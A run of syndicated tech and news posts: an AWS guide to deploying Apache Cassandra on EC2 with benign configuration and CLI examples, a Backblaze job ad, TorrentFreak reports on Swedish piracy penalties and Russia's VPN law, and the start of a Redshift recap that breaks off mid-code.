[$] Virtual private networks with WireGuard

Post Syndicated from corbet original https://lwn.net/Articles/748582/rss

Virtual private networks (VPNs) offer a lot in the way of increased
security and privacy. They have also tended to offer less desirable
features like administrative complexity and reduced performance, though; as
a result, many potential VPN users decide not to bother. A relatively new
project called WireGuard hopes to
address both of those problems with an in-kernel solution that is both
simple and fast.

Best Practices for Running Apache Cassandra on Amazon EC2

Post Syndicated from Prasad Alle original https://aws.amazon.com/blogs/big-data/best-practices-for-running-apache-cassandra-on-amazon-ec2/

Apache Cassandra is a commonly used, high performance NoSQL database. AWS customers that currently maintain Cassandra on-premises may want to take advantage of the scalability, reliability, security, and economic benefits of running Cassandra on Amazon EC2.

Amazon EC2 and Amazon Elastic Block Store (Amazon EBS) provide secure, resizable compute capacity and storage in the AWS Cloud. When combined, you can deploy Cassandra, allowing you to scale capacity according to your requirements. Given the number of possible deployment topologies, it’s not always trivial to select the most appropriate strategy suitable for your use case.

In this post, we outline three Cassandra deployment options, as well as provide guidance about determining the best practices for your use case in the following areas:

  • Cassandra resource overview
  • Deployment considerations
  • Storage options
  • Networking
  • High availability and resiliency
  • Maintenance
  • Security

Before we jump into best practices for running Cassandra on AWS, we should mention that we have many customers who decided to use DynamoDB instead of managing their own Cassandra cluster. DynamoDB is fully managed, serverless, and provides multi-master cross-region replication, encryption at rest, and managed backup and restore. Integration with AWS Identity and Access Management (IAM) enables DynamoDB customers to implement fine-grained access control for their data security needs.

Several customers who have been using large Cassandra clusters for many years have moved to DynamoDB to eliminate the complications of administering Cassandra clusters and maintaining high availability and durability themselves. Gumgum.com is one customer who migrated to DynamoDB and observed significant savings. For more information, see Moving to Amazon DynamoDB from Hosted Cassandra: A Leap Towards 60% Cost Saving per Year.

AWS provides options, so you’re covered whether you want to run your own NoSQL Cassandra database, or move to a fully managed, serverless DynamoDB database.

Cassandra resource overview

Here’s a short introduction to standard Cassandra resources and how they are implemented with AWS infrastructure. If you’re already familiar with Cassandra or AWS deployments, this can serve as a refresher.

Resource: Cluster
  Cassandra: A single Cassandra deployment. This typically consists of multiple physical locations, keyspaces, and physical servers.
  AWS: A logical deployment construct in AWS that maps to an AWS CloudFormation StackSet, which consists of one or many CloudFormation stacks to deploy Cassandra.

Resource: Datacenter
  Cassandra: A group of nodes configured as a single replication group.
  AWS: A logical deployment construct in AWS. A datacenter is deployed with a single CloudFormation stack consisting of Amazon EC2 instances, networking, storage, and security resources.

Resource: Rack
  Cassandra: A collection of servers. A datacenter consists of at least one rack. Cassandra tries to place the replicas on different racks.
  AWS: A single Availability Zone.

Resource: Server/node
  Cassandra: A physical or virtual machine running Cassandra software.
  AWS: An EC2 instance.

Resource: Token
  Cassandra: Conceptually, the data managed by a cluster is represented as a ring. The ring is then divided into ranges equal to the number of nodes, with each node responsible for one or more ranges of the data. Each node is assigned a token, which is essentially a random number from the range. The token value determines the node’s position in the ring and its range of data.
  AWS: Managed within Cassandra.

Resource: Virtual node (vnode)
  Cassandra: Responsible for storing a range of data. Each vnode receives one token in the ring. A cluster (by default) consists of 256 tokens, which are uniformly distributed across all servers in the Cassandra datacenter.
  AWS: Managed within Cassandra.

Resource: Replication factor
  Cassandra: The total number of replicas across the cluster.
  AWS: Managed within Cassandra.
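The token and vnode concepts above can be sketched in a few lines of Python. This is a toy model for illustration only; Cassandra actually uses the Murmur3 partitioner, and the node names here are made up:

```python
import bisect
import hashlib

def token(key: str) -> int:
    # Stand-in for Cassandra's partitioner (which uses Murmur3);
    # any reasonably uniform hash illustrates the idea.
    return int(hashlib.md5(key.encode()).hexdigest(), 16)

class Ring:
    """Toy token ring: a key belongs to the first vnode token clockwise from it."""
    def __init__(self, nodes, vnodes_per_node=8):
        # Each node contributes several vnode tokens, sorted around the ring.
        self.entries = sorted(
            (token(f"{node}#{i}"), node)
            for node in nodes
            for i in range(vnodes_per_node)
        )
        self.tokens = [t for t, _ in self.entries]

    def owner(self, partition_key: str) -> str:
        i = bisect.bisect(self.tokens, token(partition_key)) % len(self.entries)
        return self.entries[i][1]

ring = Ring(["node-a", "node-b", "node-c"])
```

Because ownership is determined purely by token position, the same key always lands on the same node until the ring itself changes.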

Deployment considerations

One of the many benefits of deploying Cassandra on Amazon EC2 is that you can automate many deployment tasks. In addition, AWS includes services, such as CloudFormation, that allow you to describe and provision all your infrastructure resources in your cloud environment.

We recommend orchestrating each Cassandra ring with one CloudFormation template. If you are deploying in multiple AWS Regions, you can use a CloudFormation StackSet to manage those stacks. All the maintenance actions (scaling, upgrading, and backing up) should be scripted with an AWS SDK. These may live as standalone AWS Lambda functions that can be invoked on demand during maintenance.

You can get started by following the Cassandra Quick Start deployment guide. Keep in mind that this guide does not address the requirements to operate a production deployment and should be used only for learning more about Cassandra.
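To make the one-stack-per-ring recommendation concrete, a minimal CloudFormation fragment for a single Cassandra node might look like the following. This is only an illustrative sketch; the parameter names, instance type, and tags are assumptions, not taken from the Quick Start:

```yaml
AWSTemplateFormatVersion: '2010-09-09'
Description: Minimal sketch of one node in a Cassandra ring stack (placeholders).
Parameters:
  CassandraAmi:
    Type: AWS::EC2::Image::Id      # hypothetical AMI parameter
  SubnetId:
    Type: AWS::EC2::Subnet::Id
Resources:
  CassandraNode:
    Type: AWS::EC2::Instance
    Properties:
      InstanceType: i3.2xlarge     # storage-optimized, matching the storage guidance
      ImageId: !Ref CassandraAmi
      SubnetId: !Ref SubnetId
      Tags:
        - Key: Role
          Value: cassandra-node
```

A real ring template would add the networking, storage, and security resources described in the datacenter mapping, and a StackSet would replicate it across Regions.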

Deployment patterns

In this section, we discuss various deployment options available for Cassandra in Amazon EC2. A successful deployment starts with thoughtful consideration of these options. Consider the amount of data, network environment, throughput, and availability.

  • Single AWS Region, 3 Availability Zones
  • Active-active, multi-Region
  • Active-standby, multi-Region

Single AWS Region, 3 Availability Zones

In this pattern, you deploy the Cassandra cluster in one AWS Region and three Availability Zones. There is only one ring in the cluster. By using EC2 instances in three zones, you ensure that the replicas are distributed uniformly in all zones.

To ensure the even distribution of data across all Availability Zones, we recommend that you distribute the EC2 instances evenly in all three Availability Zones. The number of EC2 instances in the cluster is a multiple of three (the replication factor).

This pattern is suitable in situations where the application is deployed in one Region or where deployments in different Regions should be constrained to the same Region because of data privacy or other legal requirements.

Pros:

  • Highly available; can sustain failure of one Availability Zone.
  • Simple deployment.

Cons:

  • Does not protect in a situation when many of the resources in a Region are experiencing intermittent failure.


Active-active, multi-Region

In this pattern, you deploy two rings in two different Regions and link them. The VPCs in the two Regions are peered so that data can be replicated between two rings.

We recommend that the two rings in the two Regions be identical in nature, having the same number of nodes, instance types, and storage configuration.

This pattern is most suitable when the applications using the Cassandra cluster are deployed in more than one Region.

Pros:

  • No data loss during failover.
  • Highly available; can sustain when many of the resources in a Region are experiencing intermittent failures.
  • Read/write traffic can be localized to the closest Region for the user, for lower latency and higher performance.

Cons:

  • High operational overhead.
  • The second Region effectively doubles the cost.


Active-standby, multi-region

In this pattern, you deploy two rings in two different Regions and link them. The VPCs in the two Regions are peered so that data can be replicated between two rings.

However, the second Region does not receive traffic from the applications. It only functions as a secondary location for disaster recovery reasons. If the primary Region is not available, the second Region receives traffic.

We recommend that the two rings in the two Regions be identical in nature, having the same number of nodes, instance types, and storage configuration.

This pattern is most suitable when the applications using the Cassandra cluster require low recovery point objective (RPO) and recovery time objective (RTO).

Pros:

  • No data loss during failover.
  • Highly available; can sustain failure or partitioning of one whole Region.

Cons:

  • High operational overhead.
  • High latency for writes for eventual consistency.
  • The second Region effectively doubles the cost.

Storage options

In on-premises deployments, Cassandra uses local disks to store data. There are two storage options for EC2 instances:

  • Instance store (ephemeral storage)
  • Amazon EBS

Your choice of storage is closely related to the type of workload supported by the Cassandra cluster. Instance store works best for most general purpose Cassandra deployments. However, in certain read-heavy clusters, Amazon EBS is a better choice.

The choice of instance type is generally driven by the type of storage:

  • If ephemeral storage is required for your application, a storage-optimized (I3) instance is the best option.
  • If your workload requires Amazon EBS, it is best to go with compute-optimized (C5) instances.
  • Burstable instance types (T2) don’t offer good performance for Cassandra deployments.

Instance store

Ephemeral storage is local to the EC2 instance. It may provide high input/output operations per second (IOPS) based on the instance type. An SSD-based instance store can support up to 3.3M IOPS on I3 instances. This high performance makes it an ideal choice for transactional or write-intensive applications such as Cassandra.

In general, instance storage is recommended for transactional, large, and medium-size Cassandra clusters. For a large cluster, read/write traffic is distributed across a higher number of nodes, so the loss of one node has less of an impact. However, for smaller clusters, a quick recovery for the failed node is important.

As an example, for a cluster with 100 nodes, the loss of 1 node is a 3.33% loss of capacity (with a replication factor of 3). Similarly, for a cluster with 10 nodes, the loss of 1 node is a 33% loss of capacity (with a replication factor of 3).

IOPS (translates to higher query performance)
  Ephemeral storage: Up to 3.3M on I3.
  Amazon EBS: Up to 80K per instance.
  Comments: This results in higher query performance on each host. However, Cassandra scales well horizontally; in general, we recommend scaling horizontally first, then scaling vertically to mitigate specific issues. Note: 3.3M IOPS is observed with 100% random read with a 4-KB block size on Amazon Linux.

AWS instance types
  Ephemeral storage: I3.
  Amazon EBS: Compute optimized, C5.
  Comments: Being able to choose between different instance types is an advantage in terms of CPU, memory, etc., for horizontal and vertical scaling.

Backup/recovery
  Ephemeral storage: Custom.
  Amazon EBS: Basic building blocks are available from AWS.
  Comments: Amazon EBS offers a distinct advantage here; it is a small engineering effort to establish a backup/restore strategy. a) In case of an instance failure, the EBS volumes from the failing instance are attached to a new instance. b) In case of an EBS volume failure, the data is restored by creating a new EBS volume from the last snapshot.

Amazon EBS

EBS volumes offer higher resiliency, and IOPS can be configured based on your storage needs. EBS volumes also offer some distinct advantages in terms of recovery time. EBS volumes can support up to 32K IOPS per volume and up to 80K IOPS per instance in a RAID configuration. They have an annualized failure rate (AFR) of 0.1–0.2%, which makes EBS volumes 20 times more reliable than typical commodity disk drives.

The primary advantage of using Amazon EBS in a Cassandra deployment is that it reduces data-transfer traffic significantly when a node fails or must be replaced. The replacement node joins the cluster much faster. However, Amazon EBS could be more expensive, depending on your data storage needs.

Cassandra has built-in fault tolerance by replicating data to partitions across a configurable number of nodes. It can not only withstand node failures but if a node fails, it can also recover by copying data from other replicas into a new node. Depending on your application, this could mean copying tens of gigabytes of data. This adds additional delay to the recovery process, increases network traffic, and could possibly impact the performance of the Cassandra cluster during recovery.

Data stored on Amazon EBS is persisted in case of an instance failure or termination. The node’s data stored on an EBS volume remains intact and the EBS volume can be mounted to a new EC2 instance. Most of the replicated data for the replacement node is already available in the EBS volume and won’t need to be copied over the network from another node. Only the changes made after the original node failed need to be transferred across the network. That makes this process much faster.

EBS volumes are snapshotted periodically. So, if a volume fails, a new volume can be created from the last known good snapshot and be attached to a new instance. This is faster than creating a new volume and copying all the data to it.

Most Cassandra deployments use a replication factor of three. However, Amazon EBS does its own replication under the covers for fault tolerance. In practice, EBS volumes are about 20 times more reliable than typical disk drives. So, it is possible to go with a replication factor of two. This not only saves cost, but also enables deployments in a region that has two Availability Zones.

EBS volumes are recommended in case of read-heavy, small clusters (fewer nodes) that require storage of a large amount of data. Keep in mind that the Amazon EBS provisioned IOPS could get expensive. General purpose EBS volumes work best when sized for required performance.


Networking

If your cluster is expected to receive high read/write traffic, select an instance type that offers 10 Gb/s performance. As an example, i3.8xlarge and c5.9xlarge both offer 10 Gb/s networking performance. A smaller instance type in the same family leads to relatively lower networking throughput.

Cassandra generates a universally unique identifier (UUID) for each node, based on the IP address of the instance. This UUID is used for distributing vnodes on the ring.

In the case of an AWS deployment, IP addresses are assigned automatically when an EC2 instance is created. If a node is replaced, the replacement instance gets a new IP address; with the new IP address, the data distribution changes and the whole ring has to be rebalanced. This is not desirable.

To preserve the assigned IP address, use a secondary elastic network interface with a fixed IP address. Before swapping an EC2 instance with a new one, detach the secondary network interface from the old instance and attach it to the new one. This way, the UUID remains same and there is no change in the way that data is distributed in the cluster.
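Sketched with the AWS CLI, the swap is two calls; the IDs are placeholders you would look up for your own instances:

```shell
# Detach the secondary ENI from the failed node (attachment ID is a placeholder).
aws ec2 detach-network-interface --attachment-id <attachment-id>

# Attach it to the replacement instance at the same device index, so the
# node keeps its fixed IP and the ring does not need to rebalance.
aws ec2 attach-network-interface \
    --network-interface-id <eni-id> \
    --instance-id <new-instance-id> \
    --device-index 1
```

In an automated deployment, these calls would live in the same scripts that replace the instance itself.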

If you are deploying in more than one region, you can connect the two VPCs in two regions using cross-region VPC peering.

High availability and resiliency

Cassandra is designed to be fault-tolerant and highly available during multiple node failures. In the patterns described earlier in this post, you deploy Cassandra to three Availability Zones with a replication factor of three. Even though it limits the AWS Region choices to the Regions with three or more Availability Zones, it offers protection for the cases of one-zone failure and network partitioning within a single Region. The multi-Region deployments described earlier in this post protect when many of the resources in a Region are experiencing intermittent failure.

Resiliency is ensured through infrastructure automation. The deployment patterns all require a quick replacement of the failing nodes. In the case of a regionwide failure, when you deploy with the multi-Region option, traffic can be directed to the other active Region while the infrastructure is recovering in the failing Region. In the case of unforeseen data corruption, the standby cluster can be restored with point-in-time backups stored in Amazon S3.


Maintenance

In this section, we look at ways to ensure that your Cassandra cluster is healthy:

  • Scaling
  • Upgrades
  • Backup and restore


Scaling

Cassandra is horizontally scaled by adding more instances to the ring. We recommend doubling the number of nodes in a cluster to scale up in one scale operation. This leaves the data homogeneously distributed across Availability Zones. Similarly, when scaling down, it’s best to halve the number of instances to keep the data homogeneously distributed.

Cassandra is vertically scaled by increasing the compute power of each node. Larger instance types have proportionally bigger memory. Use deployment automation to swap instances for bigger instances without downtime or data loss.


Upgrades

All three types of upgrades (Cassandra, operating system patching, and instance type changes) follow the same rolling upgrade pattern.

In this process, you start with a new EC2 instance and install software and patches on it. Thereafter, remove one node from the ring. For more information, see Cassandra cluster Rolling upgrade. Then, you detach the secondary network interface from one of the EC2 instances in the ring and attach it to the new EC2 instance. Restart the Cassandra service and wait for it to sync. Repeat this process for all nodes in the cluster.

Backup and restore

Your backup and restore strategy is dependent on the type of storage used in the deployment. Cassandra supports snapshots and incremental backups. When using instance store, a file-based backup tool works best. Customers use rsync or other third-party products to copy data backups from the instance to long-term storage. For more information, see Backing up and restoring data in the DataStax documentation. This process has to be repeated for all instances in the cluster for a complete backup. These backup files are copied back to new instances to restore. We recommend using S3 to durably store backup files for long-term storage.

For Amazon EBS based deployments, you can enable automated snapshots of EBS volumes to back up volumes. New EBS volumes can be easily created from these snapshots for restoration.


Security

We recommend that you think about security in all aspects of deployment. The first step is to ensure that the data is encrypted at rest and in transit. The second step is to restrict access to unauthorized users. For more information about security, see the Cassandra documentation.

Encryption at rest

Encryption at rest can be achieved by using EBS volumes with encryption enabled. Amazon EBS uses AWS KMS for encryption. For more information, see Amazon EBS Encryption.

Instance store–based deployments require using an encrypted file system or an AWS partner solution. If you are using DataStax Enterprise, it supports transparent data encryption.

Encryption in transit

Cassandra uses Transport Layer Security (TLS) for client and internode communications.
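For example, internode and client TLS are enabled in cassandra.yaml. The keystore paths and passwords below are placeholders; see the Cassandra security documentation for the full option set:

```yaml
# cassandra.yaml -- TLS settings (paths and passwords are placeholders)
server_encryption_options:
  internode_encryption: all          # encrypt all node-to-node traffic
  keystore: /etc/cassandra/conf/keystore.jks
  keystore_password: changeit
  truststore: /etc/cassandra/conf/truststore.jks
  truststore_password: changeit

client_encryption_options:
  enabled: true                      # require TLS from clients
  keystore: /etc/cassandra/conf/keystore.jks
  keystore_password: changeit
```

The keystore and truststore must be distributed to every node, which is another task worth folding into your deployment automation.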


Authentication

The security mechanism is pluggable, which means that you can easily swap out one authentication method for another. You can also provide your own method of authenticating to Cassandra, such as a Kerberos ticket, or if you want to store passwords in a different location, such as an LDAP directory.


Authorization

The authorizer that’s plugged in by default is org.apache.cassandra.auth.AllowAllAuthorizer. Cassandra also provides a role-based access control (RBAC) capability, which allows you to create roles and assign permissions to these roles.
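A short CQL sketch of the RBAC model; the role, user, and keyspace names here are made up for illustration:

```sql
-- Hypothetical role, user, and keyspace names.
CREATE ROLE analysts WITH LOGIN = false;
CREATE ROLE alice WITH PASSWORD = 'changeit' AND LOGIN = true;

-- Grant read-only access on a keyspace to the role,
-- then give the user that role.
GRANT SELECT ON KEYSPACE metrics TO analysts;
GRANT analysts TO alice;
```

Grouping permissions into roles like this keeps per-user administration small as the cluster's user base grows.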


In this post, we discussed several patterns for running Cassandra in the AWS Cloud and how you can manage Cassandra databases running on Amazon EC2. AWS also provides managed offerings for a number of databases. To learn more, see Purpose-built databases for all your application needs.

If you have questions or suggestions, please comment below.

Additional Reading

If you found this post useful, be sure to check out Analyze Your Data on Amazon DynamoDB with Apache Spark and Analysis of Top-N DynamoDB Objects using Amazon Athena and Amazon QuickSight.

About the Authors

Prasad Alle is a Senior Big Data Consultant with AWS Professional Services. He spends his time leading and building scalable, reliable Big data, Machine learning, Artificial Intelligence and IoT solutions for AWS Enterprise and Strategic customers. His interests extend to various technologies such as Advanced Edge Computing, Machine learning at Edge. In his spare time, he enjoys spending time with his family.




Provanshu Dey is a Senior IoT Consultant with AWS Professional Services. He works on highly scalable and reliable IoT, data and machine learning solutions with our customers. In his spare time, he enjoys spending time with his family and tinkering with electronics & gadgets.




Wanted: Senior Systems Administrator

Post Syndicated from Yev original https://www.backblaze.com/blog/wanted-senior-systems-administrator/

Wanted: Senior Systems Administrator

We’re looking for someone who enjoys solving difficult problems, running down elusive tech gremlins, and improving our environment one server at a time. If you enjoy being stretched, learning new skills, and want to look forward to seeing your co-workers every day, then we want you!

Backblaze is a small (in headcount) cloud storage (and backup!) company with a big mission, bringing feature-rich and accessible services to the masses, even if they don’t have unlimited VC funding (because we don’t either)! We believe in a fun and positive work environment where people can learn and grow, and where a sense of community is not just a buzzword from a company handbook (though you might probably find it in there).

What You’ll Be Doing

  • Mastering your craft, becoming a subject matter expert, and acting as an escalation point for areas of expertise (this means responding to pages in your areas of ownership as well)
  • Leading projects across a range of IT operations disciplines
  • Developing a thorough understanding of the environment and the skills necessary to troubleshoot all systems and services
  • Collaborating closely with other teams (Engineering, Infrastructure, etc.) to build out new systems and improve existing ones
  • Participating in on-call rotation when necessary
  • Petting the office dogs when appropriate

What You Should Have

  • 5+ years of work as a Systems Administrator (or equivalent college degree)
  • Expert knowledge of Linux systems administration (Debian preferred)
  • Ability to work under pressure in a fast-paced startup environment
  • A passion for building and improving all manner of systems and services
  • Excellent problem solving, investigative, and troubleshooting skills
  • Strong interpersonal communication skills
  • Local enough to commute to San Mateo office

Highly Desirable Skills

  • Experience working at a technology/software startup
  • Configuration management and automation software (Ansible preferred)
  • Familiarity with server and storage system hardware and configurations
  • Understanding of Java servlet containers (Tomcat preferred)
  • Skill in administration of different software suites and cloud-based integrations (G Suite, PagerDuty, etc.)
  • Comprehension of standard web services and packages (WordPress, Apache, etc.)

Some Backblaze Perks

  • Generous healthcare plans
  • Competitive compensation and 401k
  • All employees receive Option grants
  • Unlimited vacation days
  • Strong coffee
  • Fully stocked Micro kitchens
  • Weekly catered breakfast and lunches
  • Awesome people who work on awesome projects
  • Childcare bonus (human children only)
  • Get to bring your (well behaved) pets into the office
  • Backblaze is an Equal Opportunity Employer and we offer competitive salary and benefits, including our no policy vacation policy

If this sounds like you — follow these steps:

  1. Send an email to jobscontact@backblaze.com with the position in the subject line.
  2. Include your resume.
  3. Tell us a bit about your experience and why you’re excited to work with Backblaze.

The post Wanted: Senior Systems Administrator appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Hollywood Commissioned Tough Jail Sentences for Online Piracy, ISP Says

Post Syndicated from Andy original https://torrentfreak.com/hollywood-commissioned-tough-jail-sentences-for-online-piracy-isp-says-180227/

According to local prosecutors who have handled many copyright infringement cases over the past decade, Sweden is nowhere near tough enough on those who commit online infringement.

With this in mind, the government sought advice on how such crimes should be punished, not only more severely, but also in proportion to the damages alleged to have been caused by defendants’ activities.

The corresponding report was returned to Minister for Justice Heléne Fritzon earlier this month by Council of Justice member Dag Mattsson. The paper proposed a new tier of offenses that should receive special punishment when there are convictions for large-scale copyright infringement and “serious” trademark infringement.

Partitioning the offenses into two broad categories, the report envisions those found guilty of copyright infringement or trademark infringement “of a normal grade” may be sentenced to fines or imprisonment up to a maximum of two years. For those at the other end of the scale, engaged in “cases of gross crimes”, the penalty sought is a minimum of six months in prison and not more than six years.

The proposals have been criticized by those who feel that copyright infringement shouldn’t be put on a par with more serious and even potentially violent crimes. On the other hand, tools to deter larger instances of infringement have been welcomed by entertainment industry groups, who have long sought more robust sentencing options in order to protect their interests.

In the middle, however, are Internet service providers such as Bahnhof, who are often dragged into the online piracy debate due to the allegedly infringing actions of some of their customers. In a statement on the new proposals, the company is clear on why Sweden is preparing to take such a tough stance against infringement.

“It’s not a daring guess that media companies are asking for Sweden to tighten the penalty for illegal file sharing and streaming,” says Bahnhof lawyer Wilhelm Dahlborn.

“It would have been better if the need for legislative change had taken place at EU level and co-ordinated with other similar intellectual property legislation.”

Bahnhof chief Jon Karlung, who is never afraid to speak his mind on such matters, goes a step further. He believes the initiative amounts to a gift to the United States.

“It’s nothing but a commission from the American film industry,” Karlung says.

“I do not mind them going for their goals in court and trying to protect their interests, but it does not mean that the state, the police, and ultimately taxpayers should put mass resources on it.”

Bahnhof notes that the proposals for the toughest extended jail sentences aren’t directly aimed at petty file-sharers. However, the introduction of a new offense of “gross crime” means that the limitation period shifts from the current five years to ten.

It also means that due to the expansion of prison terms beyond two years, secret monitoring of communications (known as HÖK) could come into play.

“If the police have access to HÖK, it can be used to get information about which individuals are file sharing,” warns Bahnhof lawyer Wilhelm Dahlborn.

“One can also imagine a scenario where media companies increasingly report crime as gross in order to get the police to do the investigative work they have previously done. Harder punishments to tackle file-sharing also appear very old-fashioned and equally ineffective.”

As noted in our earlier report, the new proposals also include measures that would enable the state to confiscate all kinds of property, both physical items and more intangible assets such as domain names. Bahnhof also takes issue with this, noting that domains are not the problem here.

“In our opinion, it is not the domain name which is the problem, it is the content of the website that the domain name points to,” the company says.

“Moreover, confiscation of a domain name may conflict with constitutional rules on freedom of expression in a way that is very unfortunate. The issues of freedom of expression and why copyright infringement is to be treated differently haven’t been addressed much in the investigation.”

Under the new proposals, damage to rightsholders and monetary gain by the defendant would also be taken into account when assessing whether a crime is “gross” or not. This raises questions as to what extent someone could be held liable for piracy when a rightsholder maintains damage was caused yet no profit was generated.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Pirate Site Operators’ Jail Sentences Overturned By Court of Appeal

Post Syndicated from Andy original https://torrentfreak.com/pirate-site-operators-jail-sentences-overturned-by-court-of-appeal-180226/

With The Pirate Bay proving to be somewhat of an elusive and irritating target, in 2014 police took on a site capturing an increasing portion of the Swedish pirate market.

Unlike The Pirate Bay which uses torrents, Dreamfilm was a portal for streaming content and it quickly grew alongside the now-defunct Swefilmer to dominate the local illicit in-browser viewing sector. But after impressive growth, things came to a sudden halt.

In January 2015, Dreamfilm announced that the site would be shut down after one of its administrators was detained by the authorities and interrogated. A month later, several more Sweden-based sites went down including the country’s second largest torrent site Tankefetast, torrent site PirateHub, and streaming portal Tankefetast Play (TFPlay).

Anti-piracy group Rights Alliance described the four-site network as one of “Europe’s leading players for illegal file sharing and streaming.”

Image published by Dreamfilm after the raid

After admitting they’d been involved in the sites but insisting they’d committed no crimes, last year four men aged between 21 and 31 appeared in court charged with copyright infringement. It didn’t go well.

The Linköping District Court found them guilty and decided they should all go to prison, with the then 23-year-old founder receiving the harshest sentence of 10 months, a member of the Pirate Party who reportedly handled advertising receiving 8 months, and two others getting six months each. On top, they were ordered to pay damages of SEK 1,000,000 ($122,330) to film industry plaintiffs.

Like many similar cases in Sweden, the case went to appeal and late last week the court handed down its decision which amends the earlier decision in several ways.

Firstly, the Hovrätten (Court of Appeal) agreed with the District Court’s ruling that the defendants had used dreamfilm.se, tfplay.org, tankafetast.com and piratehub.net as platforms to deliver movies stored on Russian servers to the public.

One defendant owned the domains, another worked as a site supervisor, while the other pair worked as a programmer and in server acquisition, the Court said.

Dagens Juridik reports that the defendants argued that the websites were not a prerequisite for people to access the films, and therefore they had not been made available to a new market.

However, the Court of Appeal agreed with the District Court’s assessment that the links meant that the movies had been made available to a “new audience”, which under EU law means that a copyright infringement had been committed. As far as the samples presented in the case would allow, the men were found to have committed between 45 and 118 breaches of copyright law.

The Court also found that the website operation had a clear financial motive, delivering movies to the public for free while earning money from advertising.

While agreeing with the District Court on most points, the Court of Appeal decided to boost the damages award from SEK 1,000,000 ($122,330) to SEK 4,250,000 ($519,902). However, there was much better news in respect of the prison sentences.

Taking into consideration the young age of the men (who before this case had no criminal records) and the unlikelihood that they would offend again, the Court decided that none would have to go to prison as previously determined.

Instead, all of the men were handed conditional sentences with two ordered to pay daily fines, which are penalties based on the offender’s daily personal income.

Last week it was reported that Sweden is preparing to take a tougher line with large-scale online copyright infringers. Proposals currently with the government foresee a new crime of “gross infringement” under both copyright and trademark law, which could lead to sentences of up to six years in prison.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Russia VPN Blocking Law Failing? No Provider Told To Block Any Site

Post Syndicated from Andy original https://torrentfreak.com/russia-vpn-blocking-law-failing-no-provider-told-to-block-any-site-180224/

Maintaining Russia’s pressure on websites banned for copyright infringement and other offenses, President Vladimir Putin signed a brand new bill into law in July 2017.

The legislation aimed to prevent citizens from circumventing ISP blockades with the use of services such as VPNs, proxies, Tor, and other anonymizing services. The theory was that if VPNs were found to be facilitating access to banned sites, they too would find themselves on Russia’s national Internet blacklist.

The list is maintained by local telecoms watchdog Roskomnadzor and currently contains many tens of thousands of restricted domains. In respect of VPNs, the Federal Security Service (FSB) and the Ministry of Internal Affairs are tasked with monitoring ‘unblocking’ offenses, which they are then expected to refer to the telecoms watchdog for action.

The legislation caused significant uproar both locally and overseas and was widely predicted to signal a whole new level of censorship in Russia. However, things haven’t played out that way; far from it. Since being introduced on November 1, 2017, not a single VPN provider has been cautioned over its activities, much less advised to block anything or cease and desist.

The revelation comes via Russian news outlet RBC, which received official confirmation from Roskomnadzor itself that no VPN or anonymization service had been asked to take action to prevent access to blocked sites. Given the attention to detail when the law was passed, the reasons seem extraordinary.

While Roskomnadzor is empowered to put VPN providers on the blacklist, it must first be instructed to do so by the FSB, after that organization has carried out an investigation. Once the FSB gives the go-ahead, Roskomnadzor can then order the provider to connect itself to the federal state information system, known locally as FGIS.

FGIS is the system that contains the details of nationally blocked sites, and if a VPN provider does not interface with it within 30 days of being ordered to do so, it too will be added to the blocklist by Roskomnadzor. The trouble is, Roskomnadzor hasn’t received any requests to contact VPNs from higher up the chain, so it can’t do anything.

“As of today, there have been no requests from the members of the RDD [operational and investigative activities] and state security regarding anonymizers and VPN services,” a Roskomnadzor spokesperson said.

However, the problems don’t end there. RBC quotes Karen Ghazaryan, an analyst at the Russian Electronic Communications Association (RAEC), who says that even if it had received instructions, Roskomnadzor wouldn’t be able to block the VPN services in question, for both technical and legal reasons.

“Roskomnadzor does not have leverage over most VPN services, and they can not block them for failing to comply with the law, because Roskomnadzor does not have ready technical solutions for this, and the law does not yet have relevant by-laws,” the expert said.

“Copying the Chinese model of fighting VPNs in Russia will not be possible because of its high cost and the radically different topology of the Russian segment of the Internet,” Ghazaryan adds.

This apparent inability to act is surprising, not least since millions of Russian Internet users are now using VPNs, anonymizers, and similar services on a regular basis. Ghazaryan puts the figure as high as 25% of all Russian Internet users.

However, there is also a third element to Russia’s VPN dilemma – how to differentiate between VPNs used by the public and those used in a commercial environment. China is trying to solve this problem by forcing VPN providers to register and align themselves with the state. Russia hasn’t tried that, yet.

“The [blocking] law says that it does not apply to corporate VPN networks, but there is no way to distinguish them from services used for personal needs,” concludes Sarkis Darbinian from the anti-censorship project Roskomsvoboda.

This week, Russia’s Ministry of Culture unveiled yet more new proposals for dealing with copyright infringement via a bill that would allow websites to be blocked without a court order. It’s envisioned that if pirate material is found on a site and its operator either fails to respond to a complaint or leaves the content online for more than 24 hours, ISPs will be told to block the entire site.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Amazon Redshift – 2017 Recap

Post Syndicated from Larry Heathcote original https://aws.amazon.com/blogs/big-data/amazon-redshift-2017-recap/

We have been busy adding new features and capabilities to Amazon Redshift, and we wanted to give you a glimpse of what we’ve been doing over the past year. In this article, we recap a few of our enhancements and provide a set of resources that you can use to learn more and get the most out of your Amazon Redshift implementation.

In 2017, we made more than 30 announcements about Amazon Redshift. We listened to you, our customers, and delivered Redshift Spectrum, a feature of Amazon Redshift that gives you the ability to extend analytics to your data lake—without moving data. We launched new DC2 nodes, doubling performance at the same price. We also announced many new features that provide greater scalability, better performance, more automation, and easier ways to manage your analytics workloads.

To see a full list of our launches, visit our what’s new page—and be sure to subscribe to our RSS feed.

Major launches in 2017

Amazon Redshift Spectrum—extend analytics to your data lake, without moving data

We launched Amazon Redshift Spectrum to give you the freedom to store data in Amazon S3, in open file formats, and have it available for analytics without the need to load it into your Amazon Redshift cluster. It enables you to easily join datasets across Redshift clusters and S3 to provide unique insights that you would not be able to obtain by querying independent data silos.

With Redshift Spectrum, you can run SQL queries against data in an Amazon S3 data lake as easily as you analyze data stored in Amazon Redshift. And you can do it without loading data or resizing the Amazon Redshift cluster based on growing data volumes. Redshift Spectrum separates compute and storage to meet workload demands for data size, concurrency, and performance. Redshift Spectrum scales processing across thousands of nodes, so results are fast, even with massive datasets and complex queries. You can query open file formats that you already use—such as Apache Avro, CSV, Grok, ORC, Apache Parquet, RCFile, RegexSerDe, SequenceFile, TextFile, and TSV—directly in Amazon S3, without any data movement.
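As a rough sketch of the workflow described above (every name below—the schema, database, IAM role, bucket, and tables—is invented for illustration, not a runnable configuration), querying S3 data through Redshift Spectrum means defining an external schema and external table, then joining it with local Redshift tables in ordinary SQL:

```sql
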